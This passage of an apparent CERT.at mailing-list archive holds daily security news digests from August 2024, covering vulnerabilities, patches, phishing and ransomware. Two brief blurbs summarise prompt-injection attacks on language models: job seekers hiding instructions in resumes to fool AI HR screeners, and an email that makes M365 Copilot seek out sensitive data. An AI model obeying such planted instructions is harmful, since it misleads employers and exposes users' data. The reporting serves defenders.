Department, Arjuna Team, and RESIDENT.ngo, engages targets with personalized and highly-plausible social engineering in an attempt to gain access to their online accounts. [..] The Citizen Lab is sharing all indicators with major email providers to assist them in tracking and blocking these campaigns. --------------------------------------------- https://citizenlab.ca/2024/08/sophisticated-phishing-targets-russias-percei… ∗∗∗ Bundestrojaner: So funktioniert die Chat-Überwachung ∗∗∗ --------------------------------------------- Ein Bundestrojaner ist eine Schadsoftware, die von Behörden und der Polizei verwendet wird. Auch verschlüsselte Nachrichten lassen sich dadurch lesen. --------------------------------------------- https://futurezone.at/netzpolitik/bundestrojaner-chat-ueberwachung-oesterre… ===================== = Vulnerabilities = ===================== ∗∗∗ SolarWinds fixes critical RCE bug affecting all Web Help Desk versions ∗∗∗ --------------------------------------------- A critical vulnerability in SolarWinds Web Help Desk solution for customer support could be exploited to achieve remote code execution, the American business software developer warns in a security advisory today. --------------------------------------------- https://www.bleepingcomputer.com/news/security/solarwinds-fixes-critical-rc… ∗∗∗ Fortinet, Zoom Patch Multiple Vulnerabilities ∗∗∗ --------------------------------------------- Fortinet and Zoom have released patches for multiple vulnerabilities in their products, including high-severity bugs. --------------------------------------------- https://www.securityweek.com/fortinet-zoom-patch-multiple-vulnerabilities/ ∗∗∗ Patchday Microsoft: Angreifer attackieren Office und Windows mit Schadcode ∗∗∗ --------------------------------------------- Es sind wichtige Sicherheitsupdates für verschiedene Microsoft-Produkte erschienen. Aufgrund von laufenden Attacken sollten Admins zügig handeln. [..] Mit einem CVSS-Punktwert von 9,8 gehört eine Sicherheitslücke in Windows' TCP/IP-Stack zu den gefährlichsten Fehlern im aktuellen Patchday. Nicht angemeldete Angreifer, die präparierte IPv6-Pakete an Windows-Rechner schicken, können diese aus der Ferne kompromittieren und eigene Befehle ausführen. --------------------------------------------- https://heise.de/-9834085 ∗∗∗ Xen Security Advisory CVE-2024-31146 / XSA-461 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-461.html ∗∗∗ Xen Security Advisory CVE-2024-31145 / XSA-460 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-460.html ∗∗∗ Adobe Releases Security Updates for Multiple Products ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/08/14/adobe-releases-security-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 13.08.2024
by Daily end-of-shift report 13 Aug '24

13 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Montag 12-08-2024 18:00 − Dienstag 13-08-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ APT trends report Q2 2024 ∗∗∗ --------------------------------------------- The report features the most significant developments relating to APT groups in Q2 2024, including the new backdoor in Linux utility XZ, a new RAT called SalmonQT, and hacktivist activity. --------------------------------------------- https://securelist.com/apt-trends-report-q2-2024/113275/ ∗∗∗ AMD won’t patch Sinkclose security bug on older Zen CPUs ∗∗∗ --------------------------------------------- Some AMD processors dating back to 2006 have a security vulnerability that's a boon for particularly underhand malware and rogue insiders, though the chip designer is only patching models made since 2020. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/08/13/amd_sinkclos… ∗∗∗ Who uses LLM prompt injection attacks IRL? Mostly unscrupulous job seekers, jokesters and trolls ∗∗∗ --------------------------------------------- Because apps talking like pirates and creating ASCII art never gets old Despite worries about criminals using prompt injection to trick large language models (LLMs) into leaking sensitive data or performing other destructive actions, most of these types of AI shenanigans come from job seekers trying to get their resumes past automated HR screeners – and people protesting generative AI for various reasons, according to Russian security biz Kaspersky. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/08/13/who_uses_llm… ∗∗∗ CVE-2024-38856: Pre-Auth RCE Vulnerability in Apache OFBiz ∗∗∗ --------------------------------------------- On August 5, 2024, researchers at SonicWall discovered a zero-day security flaw in Apache OFBiz tracked as CVE-2024-38856. The vulnerability, which has been assigned a CVSS score of 9.8, allows threat actors to perform pre-authentication remote code execution (RCE). While testing a patch for CVE-2024-36104, SonicWall researchers discovered that unauthenticated access was permitted to the ProgramExport endpoint, potentially enabling the execution of arbitrary code. --------------------------------------------- https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce… ∗∗∗ Post-Quantum Cryptography Standards Officially Announced by NIST – a History and Explanation ∗∗∗ --------------------------------------------- NIST has formally published three post-quantum cryptography standards from the competition it held to develop cryptography able to withstand the anticipated quantum computing decryption of current asymmetric encryption. --------------------------------------------- https://www.securityweek.com/post-quantum-cryptography-standards-officially… ∗∗∗ Falsche Mitteilung im Namen des Bundeskanzleramtes über Entschädigungszahlungen ∗∗∗ --------------------------------------------- Kriminelle versenden im Namen des Bundeskanzleramtes gefälschte E-Mails über eine Entschädigungszahlung für die Wasser- und Energierechnung. Im E-Mail steht, dass Sie € 102,49 erhalten. Für den Erhalt der Summe, müssen Sie aber auf einen Link klicken. --------------------------------------------- https://www.watchlist-internet.at/news/falsche-mitteilung-im-namen-des-bund… ∗∗∗ Harnessing LLMs for Automating BOLA Detection ∗∗∗ --------------------------------------------- Learn about BOLABuster, an LLM-driven tool automating BOLA vulnerability detection in web applications. Issues have already been identified in multiple projects. --------------------------------------------- https://unit42.paloaltonetworks.com/automated-bola-detection-and-ai/ ∗∗∗ Strafverfolgern gelingt Schlag gegen Radar/Dispossessor Ransomwaregruppe ∗∗∗ --------------------------------------------- Es ist der nächste Schlag gegen Cyberkriminelle. Strafverfolger aus den USA (FBI), Großbritannien und Deutschland ist es gelungen, die Infrastruktur der Ransomwaregruppe Radar/Dispossessor zu zerschlagen. --------------------------------------------- https://www.borncity.com/blog/2024/08/13/strafverfolgern-gelingt-schlag-geg… ∗∗∗ Hackers Leak 1.4 Billion Tencent User Accounts Online ∗∗∗ --------------------------------------------- Massive data leak exposes 1.4 billion Tencent user accounts. Leaked data includes emails, phone numbers, and QQ IDs potentially linked to the “Mother of All Breaches” (MOAB). --------------------------------------------- https://hackread.com/hackers-leak-1-4-billion-tencent-user-accounts-online/ ∗∗∗ CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations ∗∗∗ --------------------------------------------- This report delves into the intricacies of the CryptoCore group’s scam and analyses their modus operandi. We will describe key exploited events, including hijacked YouTube accounts and deepfake videos, alongside a technical analysis of the fraudulent sites. One purpose of this study is to present a fundamental analysis – and key statistics – of fraudulent wallets that have received profits in the millions of dollars, as well as provide statistical data on detections, showing how victims are lured into suspicious websites and ultimately end up crypto scam victims. --------------------------------------------- https://decoded.avast.io/martinchlumecky1/cryptocore-unmasking-the-sophisti… ∗∗∗ Ivanti warns of critical vTM auth bypass with public exploit ∗∗∗ --------------------------------------------- Tracked as CVE-2024-7593, this auth bypass vulnerability is due to an incorrect implementation of an authentication algorithm that allows remote unauthenticated attackers to bypass authentication on Internet-exposed vTM admin panels. --------------------------------------------- https://www.bleepingcomputer.com/news/security/ivanti-warns-of-critical-vtm… ===================== = Vulnerabilities = ===================== ∗∗∗ Ivanti: August Security Update ∗∗∗ --------------------------------------------- Today, fixes have been released for the following solutions: Ivanti Neurons for ITSM, Ivanti Avalanche and Ivanti Virtual Traffic Manager (vTM). --------------------------------------------- https://www.ivanti.com/blog/august-security-update ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (kernel and roundcube), Fedora (microcode_ctl, pypy, python2.7, and python3.6), Oracle (389-ds-base, httpd, kernel, kernel-container, and linux-firmware), Red Hat (kernel-rt), SUSE (firefox, kubernetes1.23, libqt5-qtbase, openssl-1_1, python-gunicorn, python-Twisted, python-urllib3, and qt6-base), and Ubuntu (linux-aws-5.15, linux-gkeop-5.15, linux-ibm, linux-ibm-5.15, linux-raspi, linux-azure, linux-azure-5.15, linux-azure-fde, linux-azure-fde-5.15, linux-oem-6.8, linux-oracle-5.15, and qemu). --------------------------------------------- https://lwn.net/Articles/985481/ ∗∗∗ SAP Patches Critical Vulnerabilities in BusinessObjects, Build Apps ∗∗∗ --------------------------------------------- SAP has released 25 security notes on August 2024 Security Patch Day, including for critical vulnerabilities in BusinessObjects and Build Apps. --------------------------------------------- https://www.securityweek.com/sap-patches-critical-vulnerabilities-in-busine… ∗∗∗ CISA Releases Ten Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- AVEVA SuiteLink Server, Rockwell Automation, Ocean Data Systems --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/08/13/cisa-releases-ten-indust… ∗∗∗ Splunk: SVD-2024-0801: Third-Party Package Updates in Python for Scientific Computing - August 2024 ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-0801 ∗∗∗ Lenovo: NVIDIA GPU Display Driver - July 2024 ∗∗∗ --------------------------------------------- http://support.lenovo.com/product_security/PS500637-NVIDIA-GPU-DISPLAY-DRIV… ∗∗∗ Lenovo: LDCC and LADM Privilege Escalation Vulnerabilities ∗∗∗ --------------------------------------------- http://support.lenovo.com/product_security/PS500636-LDCC-AND-LADM-PRIVILEGE… ∗∗∗ 0patch: The "EventLogCrasher" 0day For Remotely Disabling Windows Event Log, And a Free Micropatch For It ∗∗∗ --------------------------------------------- https://blog.0patch.com/2024/01/the-eventlogcrasher-0day-for-remotely.html ∗∗∗ tenable: [R1] Stand-alone Security Patch Available for Tenable Security Center versions 6.2.1, 6.3.0 and 6.4.0: SC-202408.1 ∗∗∗ --------------------------------------------- https://www.tenable.com/security/tns-2024-13 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 12.08.2024
by Daily end-of-shift report 12 Aug '24

12 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 09-08-2024 18:00 − Montag 12-08-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Passwortmanager und VPN-Apps: Klartextpasswörter aus Prozessspeicher gelesen ∗∗∗ --------------------------------------------- Passwörter landen bei der Verarbeitung zwangsläufig im Speicher. Bei einigen Anwendungen verbleiben sie dort aber zu lange, was die Angriffsfläche vergrößert. --------------------------------------------- https://www.golem.de/news/passwortmanager-und-vpn-apps-klartextpasswoerter-… ∗∗∗ Verschlüsselung ausgehebelt: Forscher übernimmt Kontrolle über Geldautomaten ∗∗∗ --------------------------------------------- So manch ein Hacker träumt davon, die Software von Geldautomaten zu knacken, um sich beliebig viel Bargeld auszahlen zu lassen. Einem Forscher ist wohl genau das gelungen. [..] Für einen erfolgreichen Angriff ist nach Angaben des Sicherheitsforschers allerdings ein physischer Zugang zum jeweiligen Geldautomaten erforderlich, "bei dem man den oberen Teil des Geldautomaten öffnet, die Festplatte herausnimmt und dann den Inhalt der Festplatte manipuliert". --------------------------------------------- https://www.golem.de/news/verschluesselung-ausgehebelt-forscher-uebernimmt-… ∗∗∗ Experts Uncover Severe AWS Flaws Leading to RCE, Data Theft, and Full-Service Takeovers ∗∗∗ --------------------------------------------- Cybersecurity researchers have discovered multiple critical flaws in Amazon Web Services (AWS) offerings that, if successfully exploited, could result in serious consequences. [..] Following responsible disclosure in February 2024, Amazon addressed the shortcomings over several months from March to June. The findings were presented at Black Hat USA 2024. --------------------------------------------- https://thehackernews.com/2024/08/experts-uncover-severe-aws-flaws.html ∗∗∗ Living off the land with Bluetooth PAN ∗∗∗ --------------------------------------------- Just like in the living off the land native SSH blog post, this is not a new and clever method of attack, rather it is using tools that are built-in to Windows to present an unexpected vector for access to networks that could mask many of the common tools used to assess a network. [..] Look at disabling these using Intune / Group Policy configuration policies. If there is a justification for their use, consider monitoring the usage of these tools in your environment. --------------------------------------------- https://www.pentestpartners.com/security-blog/living-off-the-land-with-blue… ∗∗∗ BlackHat 2024: Remote Code Execution-Angriff auf M365 Copilot per E-Mail ∗∗∗ --------------------------------------------- Auf der BlackHat 2024 hat Michael Bargury RCE-Angriffe auf M365 Copilot gezeigt – eine E-Mail reicht, um Sensitives zu suchen. Insgesamt stellt Bargury fünf verschiedene Angriffsmethoden auf Microsofts AI-Lösungen vor. Hier mal ein kurzer Abriss zu diesem Thema. --------------------------------------------- https://www.borncity.com/blog/2024/08/11/blackhat-2024-remote-code-executio… ∗∗∗ Ongoing Social Engineering Campaign Refreshes Payloads ∗∗∗ --------------------------------------------- On June 20, 2024, Rapid7 identified multiple intrusion attempts by threat actors utilizing Techniques, Tactics, and Procedures (TTPs) that are consistent with an ongoing social engineering campaign being tracked by Rapid7. [..] The initial lure being utilized by the threat actors remains the same: an email bomb followed by an attempt to call impacted users and offer a fake solution. --------------------------------------------- https://www.rapid7.com/blog/post/2024/08/12/ongoing-social-engineering-camp… ∗∗∗ Google Patches Critical Vulnerabilities in Quick Share After Researchers’ Warning ∗∗∗ --------------------------------------------- A groundbreaking presentation at Defcon 32 has revealed critical flaws in Google’s Quick Share, a peer-to-peer data-transfer utility for Android, Windows, and Chrome operating systems. Quick Share boasts impressive versatility, utilizing Bluetooth, Wi-Fi, Wi-Fi Direct, WebRTC, and NFC to facilitate peer-to-peer file transfers however, these protocols are not designed for file transfers but rather to establish stable device connections for communication purposes. --------------------------------------------- https://hackread.com/google-patches-quick-share-vulnerabilities-warning/ ∗∗∗ Mit Domain-Based Authentication in unternehmensinterne Gruppen eindringen ∗∗∗ --------------------------------------------- Was ergeben ein uraltes Protokoll, eine millionenfach benutzte Bibliothek und eine Authentifizierung per Maildomain? Zugang zum internen Github-Netzwerk. --------------------------------------------- https://heise.de/-9830944 ===================== = Vulnerabilities = ===================== ∗∗∗ Neue Schwachstellen in OpenVPN ∗∗∗ --------------------------------------------- Microsoft hat in den OpenVPN-Clients von Android, iOS, macOS, BSD und Windows eine Reihe Schwachstellen gefunden. Angreifer könnten einige der entdeckten Schwachstellen kombinierte, um eine remote ausnutzbare Angriffskette zu erhalten, die eine Remotecodeausführung (RCE) und lokaler Privilegienerweiterung (LPE) umfasst. Die Schwachstellen sollten durch Updates beseitigt werden, wobei man teilweise auf Firmware diverser Gerätehersteller angewiesen ist. --------------------------------------------- https://www.borncity.com/blog/2024/08/10/neue-schwachstellen-in-openvpn/ ∗∗∗ Sicherheitslücken: Netzwerkmonitoringtool Zabbix kann Passwörter leaken ∗∗∗ --------------------------------------------- In aktuellen Ausgaben des Netzwerkmonitoringtools Zabbix haben die Entwickler insgesamt acht Sicherheitslücken geschlossen. Nach erfolgreichen Attacken können Angreifer etwa Passwörter im Klartext einsehen oder sogar Schadcode ausführen. --------------------------------------------- https://heise.de/-9832311 ∗∗∗ Industrial Remote Access Tool Ewon Cosy+ Vulnerable to Root Access Attacks ∗∗∗ --------------------------------------------- Security vulnerabilities have been disclosed in the industrial remote access solution Ewon Cosy+ that could be abused to gain root privileges to the devices and stage follow-on attacks. --------------------------------------------- https://thehackernews.com/2024/08/industrial-remote-access-tool-ewon-cosy.h… ∗∗∗ FreeBSD Releases Urgent Patch for High-Severity OpenSSH Vulnerability ∗∗∗ --------------------------------------------- The maintainers of the FreeBSD Project have released security updates to address a high-severity flaw in OpenSSH that attackers could potentially exploit to execute arbitrary code remotely with elevated privileges. The vulnerability, tracked as CVE-2024-7589, carries a CVSS score of 7.4 out of a maximum of 10.0, indicating high severity. --------------------------------------------- https://thehackernews.com/2024/08/freebsd-releases-urgent-patch-for-high.ht… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (httpd:2.4), Fedora (chromium, firefox, frr, neatvnc, nss, python-setuptools, and python3.13), Gentoo (AFLplusplus, Bundler, dpkg, GnuPG, GPAC, libde265, matio, MuPDF, PHP, protobuf, protobuf-python, protobuf-c, rsyslog, Ruby on Rails, and runc), Red Hat (389-ds-base, container-tools:rhel8, and httpd:2.4), SUSE (bind and ca-certificates-mozilla), and Ubuntu (linux-azure). --------------------------------------------- https://lwn.net/Articles/985336/ ∗∗∗ Warnung vor Microsoft Office Spoofing-Schwachstelle CVE-2024-38200 ∗∗∗ --------------------------------------------- Microsoft hat zum 8. August 2024 (mit Update vom 10. August 2024) eine Warnung von einer ungepatchten Spoofing-Schwachstelle CVE-2024-38200 veröffentlicht. Die Schwachstelle ist in allen Office-Versionen (Office 2016 – 2021, Office 365) enthalten. [..] Angreifer haben die Möglichkeit, über eine spezielle oder kompromittierte Webseite eine Datei bereitzustellen, um die Schwachstelle auszunutzen. Über die Sicherheitslücke könnten NTLM-Hashes gegenüber Remote-Angreifern offengelegt werden. --------------------------------------------- https://www.borncity.com/blog/2024/08/12/warnung-vor-microsoft-office-spoof… ∗∗∗ Schwachstelle "Ghostwrite" erlaubt DRAM-Zugriff in RISC-V CPUs ∗∗∗ --------------------------------------------- Deutsche Forscher fanden Schwachstellen in einzelnen RISC-V CPUs von T-Head Semiconductors. Die flexible, junge Architektur entpuppt sich dabei als Risiko. [..] Die entdeckten Schwachstellen können allerdings auch nach ihrer Offenlegung nicht mit Mikrocode oder einem Softwareupdate behoben werden, denn sie befinden sich in der Schaltung der Hardware. --------------------------------------------- https://heise.de/-9830926 ∗∗∗ B&R: 2024-08-09: Cyber Security Advisory - B&R Automation Runtime Several vulnerabilities in B&R Automation Runtime ∗∗∗ --------------------------------------------- https://www.br-automation.com/fileadmin/SA24P011-d8aaf02f.pdf ∗∗∗ Asterisk Security Advisories ∗∗∗ --------------------------------------------- https://www.asterisk.org/downloads/security-advisories/ ∗∗∗ GitLab Patch Release: 17.2.2, 17.1.4, 17.0.6 ∗∗∗ --------------------------------------------- https://about.gitlab.com/releases/2024/08/07/patch-release-gitlab-17-2-2-re… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 09.08.2024
by Daily end-of-shift report 09 Aug '24

09 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 08-08-2024 18:00 − Freitag 09-08-2024 18:00 Handler: Robert Waldner Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Malware force-installs Chrome extensions on 300,000 browsers, patches DLLs ∗∗∗ --------------------------------------------- An ongoing and widespread malware campaign force-installed malicious Google Chrome and Microsoft Edge browser extensions in over 300,000 browsers, modifying the browsers executables to hijack homepages and steal browsing history. --------------------------------------------- https://www.bleepingcomputer.com/news/security/malware-force-installs-chrom… ∗∗∗ ‘Sinkclose’ Flaw in Hundreds of Millions of AMD Chips Allows Deep, Virtually Unfixable Infections ∗∗∗ --------------------------------------------- Researchers warn that a bug in AMD’s chips would allow attackers to root into some of the most privileged portions of a computer—and that it has persisted in the company’s processors for decades. --------------------------------------------- https://www.wired.com/story/amd-chip-sinkclose-flaw/ ∗∗∗ Windows Server durch PoC-Exploit für CVE-2024-38077 gefährdet ∗∗∗ --------------------------------------------- Nochmals ein Nachgang zum Juli 2024-Patchday, bei dem Microsoft die Schwachstelle CVE-2024-38077 im Windows-Remotedesktop-Lizenzierungsdienst (RDL) von Windows Server geschlossen hat. [..] es wurde ein Proof of Concept (PoC) für diese Schwachstelle veröffentlicht. --------------------------------------------- https://www.borncity.com/blog/2024/08/09/windows-server-durch-poc-exploit-f… ∗∗∗ How Hackers Extracted the ‘Keys to the Kingdom’ to Clone HID Keycards ∗∗∗ --------------------------------------------- [HID]s actually known about the vulnerabilities [..] since sometime in 2023, when it was first informed about the technique by another security researcher [..] HID warned customers about the existence of a vulnerability that would allow hackers to clone keycards in an advisory in January, which includes recommendations about how customers can protect themselves—but it offered no software update at that time. --------------------------------------------- https://www.wired.com/story/hid-keycard-authentication-key-vulnerability/ ∗∗∗ ICANN reserves .internal for private use at the DNS level ∗∗∗ --------------------------------------------- The Internet Corporation for Assigned Names and Numbers (ICANN) has agreed to reserve the .internal top-level domain so it can become the equivalent to using the 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 IPv4 address blocks for internal networks. Those blocks are reserved for private use by the Internet Assigned Numbers Authority, which requires they never appear on the public internet. --------------------------------------------- https://www.theregister.com/2024/08/08/dot_internal_ratified/ ∗∗∗ New attack against the [Linux kernel] SLUB allocator ∗∗∗ --------------------------------------------- Researchers from Graz University of Technology have published details of a new attack on the Linux kernel called SLUBstack. The attack uses timing information to turn an ability to trigger use-after-free or double-free bugs into the ability to overwrite page tables, and thence into the ability to read and write arbitrary areas of memory. The good news is that this attack does require an existing bug to be usable; the bad news is that the kernel regularly sees bugs of this kind. --------------------------------------------- https://lwn.net/Articles/984984/ ∗∗∗ Fake-Videos: Van der Bellen & Assinger werben nicht für Investmentplattformen ∗∗∗ --------------------------------------------- Derzeit erleben wir erneut eine Welle von Deepfake-Videos, in denen österreichische Prominente auf Facebook und Instagram für Investmentplattformen werben. Lassen Sie sich nicht täuschen: Weder Bundespräsident Alexander van der Bellen noch TV-Moderator Armin Assinger sind plötzlich Finanzexperten, die eine Investmentplattform entwickelt haben. Die Plattformen sind betrügerisch und die Videos wurden von Kriminellen erstellt. --------------------------------------------- https://www.watchlist-internet.at/news/fake-videos-van-der-bellen-assinger-… ∗∗∗ Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server! ∗∗∗ --------------------------------------------- This article explores architectural issues within the Apache HTTP Server, highlighting several technical debts within Httpd, including 3 types of Confusion Attacks, 9 new vulnerabilities, 20 exploitation techniques, and over 30 case studies. [..] These vulnerabilities were reported through the official security mailing list and were addressed by the Apache HTTP Server in the 2.4.60 update published on 2024-07-01. --------------------------------------------- https://devco.re/blog/2024/08/09/confusion-attacks-exploiting-hidden-semant… ∗∗∗ Best Practices for Cisco Device Configuration ∗∗∗ --------------------------------------------- In recent incidents, CISA has seen malicious cyber actors acquire system configuration files by leveraging available protocols or software on devices, such as abusing the legacy Cisco Smart Install feature. CISA recommends organizations disable Smart Install and review NSA’s Smart Install Protocol Misuse advisory and Network Infrastructure Security Guide for configuration guidance. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/08/08/best-practices-cisco-dev… ∗∗∗ Sicherheitsforscher verwandeln Sonos-One-Lautsprecher in Wanze ∗∗∗ --------------------------------------------- Angreifer können über das eingebaute Mikrofon von Sonos-One-Lautsprechern Gespräche mitschneiden. Mittlerweile ist das Sicherheitsproblem gelöst. --------------------------------------------- https://heise.de/-9830061 ===================== = Vulnerabilities = ===================== ∗∗∗ Schwachstellen in 1Password gefährden MacOS-Nutzer [CVE-2024-42218, CVE-2024-42219] ∗∗∗ --------------------------------------------- In 1Password 8 für Mac klaffen zwei Sicherheitslücken, die es Angreifern ermöglichen, Tresorelemente von MacOS-Nutzern abzugreifen. [..] Damit ein Angriff gelingt, muss ein Angreifer allerdings bei beiden Lücken bereits in der Lage sein, auf dem Zielsystem eine eigene Software auszuführen. --------------------------------------------- https://www.golem.de/news/datenabfluss-moeglich-schwachstellen-in-1password… ∗∗∗ Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability [CVE-2024-38219] ∗∗∗ --------------------------------------------- Successful exploitation of this vulnerability requires an attacker to gather information specific to the environment and take additional actions prior to exploitation to prepare the target environment. Fxied in Microsoft Edge Version 127.0.2651.98 released 8/8/2024. --------------------------------------------- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38219 ∗∗∗ Microsoft Edge (HTML-based) Memory Corruption Vulnerability [CVE-2024-38218] ∗∗∗ --------------------------------------------- The word Remote in the title refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE). The attack itself is carried out locally. This means an attacker or victim needs to execute code from the local machine to exploit the vulnerability. Fixed in Microsoft Edge Version 127.0.2651.98 released 8/8/2024. --------------------------------------------- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38218 ∗∗∗ Multiple vulnerabilities in LogSign ∗∗∗ --------------------------------------------- https://www.zerodayinitiative.com/advisories/ZDI-24-1102/ http://www.zerodayinitiative.com/advisories/ZDI-24-1103/ http://www.zerodayinitiative.com/advisories/ZDI-24-1104/ https://www.zerodayinitiative.com/advisories/ZDI-24-1105/ https://www.zerodayinitiative.com/advisories/ZDI-24-1106/ --------------------------------------------- https://support.logsign.net/hc/en-us/articles/20617133769362-07-08-2024-Ver… ∗∗∗ PostgreSQL relation replacement during pg_dump executes arbitrary SQL [CVE-2024-7348] ∗∗∗ --------------------------------------------- Time-of-check Time-of-use (TOCTOU) race condition in pg_dump in PostgreSQL allows an object creator to execute arbitrary SQL functions as the user running pg_dump, which is often a superuser. The attack involves replacing another relation type with a view or foreign table. The attack requires waiting for pg_dump to start, but winning the race condition is trivial if the attacker retains an open transaction. Versions before PostgreSQL 16.4, 15.8, 14.13, 13.16, and 12.20 are affected. --------------------------------------------- https://www.postgresql.org/support/security/CVE-2024-7348/ ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (httpd, kernel, kernel-rt, and libtiff), Debian (postgresql-13, postgresql-15, and thunderbird), Fedora (frr, thunderbird, vim, and xrdp), Gentoo (Librsvg, Nautilus, ncurses, Percona XtraBackup, QEMU, and re2c), Red Hat (httpd, kernel, kernel-rt, openssl, and python-setuptools), SUSE (bind, ffmpeg-4, kubernetes1.23, kubernetes1.24, python-Django, and python3-Twisted), and Ubuntu (linux, linux-aws, linux-aws-5.4, linux-gcp, linux-gcp-5.4, linux-gkeop, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm, linux-raspi, linux-xilinx-zynqmp, linux, linux-aws, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux, linux-aws, linux-gcp, linux-gke, linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-oem-6.8, linux-nvidia-lowlatency, linux-oracle, linux-oracle, linux-oracle-5.4, salt. --------------------------------------------- https://lwn.net/Articles/984966/ ∗∗∗ New FileSender 2.49 release with major changes ∗∗∗ --------------------------------------------- We are happy to announce the release of FileSender 2.49. This new release includes security updates that you should install. Also, it offers a few features and improvements, as well as many bug fixes. --------------------------------------------- https://connect.geant.org/2024/08/08/new-filesender-2-49-release-with-major… ∗∗∗ 0.0.0.0 Day-Schwachstelle ermöglicht seit 18 Jahren Angriffe auf Browser ∗∗∗ --------------------------------------------- Sicherheitsforscher haben offen gelegt, dass Hacker einen seit 18 Jahren bekannten, alten Fehler in Safari, Chrome und Firefox ausgenutzt haben, um in private Netzwerke einzudringen. Die als "0.0.0.0 Day" bezeichnete Sicherheitslücke ermöglicht es böswilligen Websites, die Browsersicherheit zu umgehen und mit Diensten zu interagieren, die im lokalen Netzwerk einer Organisation laufen. Dies kann zu unautorisiertem Zugriff und Remotecodeausführung auf lokalen Diensten durch Angreifer außerhalb des Netzwerks führen. Die Browserhersteller beginnen nun, diese Adresse zu blockieren. --------------------------------------------- https://www.borncity.com/blog/2024/08/09/0-0-0-0-day-schwachstelle-ermglich… ∗∗∗ RaonSecure Product Security Advisory ∗∗∗ --------------------------------------------- Overview RaonSecure has released an update to address a vulnerability in their products. Users of affected versions are advised to update to the latest version. Affected Products TouchEn nxKey version: ~ 1.0.0.87 (included) --------------------------------------------- https://asec.ahnlab.com/en/82372/ ∗∗∗ LibreOffice: Ability to trust not validated macro signatures removed in high security mode [CVE-2024-6472] ∗∗∗ --------------------------------------------- https://www.libreoffice.org/about-us/security/advisories/CVE-2024-6472 ∗∗∗ IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to multiple Vim-minimal Package Issues ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164174 ∗∗∗ Multiple security vulnerabilities are addressed with IBM Cloud Pak for Business Automation iFixes for July 2024. ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7161907 ∗∗∗ Multiple vulnerabilities in IBM Business Automation Workflow Machine Learning Server are addressed with 24.0.0-IF001 ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164164 ∗∗∗ IBM Cloud Pak for Data is vulnerable to unknown impact and attack vector due to Python certifi ( CVE-2022-23491 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164180 ∗∗∗ IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to multiple Base OS issues ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164175 ∗∗∗ IBM Cloud Pak for Data is vulnerable to session hijacking due to Node.js passport module ( CVE-2022-25896 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164201 ∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Node.js http-cache-semantics module ( CVE-2022-25881 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164225 ∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Node.js cookiejar module ( CVE-2022-25901 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164200 ∗∗∗ IBM Cloud Pak for Data is vulnerable to cross-site scripting due to Jinja2 ( CVE-2024-34064 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164204 ∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Pallets Werkzeug ( CVE-2023-46136 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164208 ∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Express.js ( CVE-2022-24999 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164217 ∗∗∗ IBM Cloud Pak for Data is vulnerable to several issues due to the go compiler ( CVE-2022-41724 CVE-2021-34558 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164255 ∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Rack ( CVE-2024-26146 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164274 ∗∗∗ IBM Cloud Pak 